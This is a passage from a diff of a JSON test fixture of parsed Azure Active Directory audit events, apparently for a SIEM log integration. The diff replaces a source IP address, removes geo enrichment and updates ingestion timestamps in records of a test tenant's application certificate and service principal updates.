Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management 
\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125255600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescri
ption\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, 
S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -15074,25 +13778,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -15106,7 +13792,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -15220,7 +13906,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -15232,12 +13918,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036487100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management 
\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125262400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescri
ption\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, 
S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -15263,25 +13949,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -15295,7 +13963,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -15418,7 +14086,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -15430,12 +14098,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036493400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\
":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125266700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Va
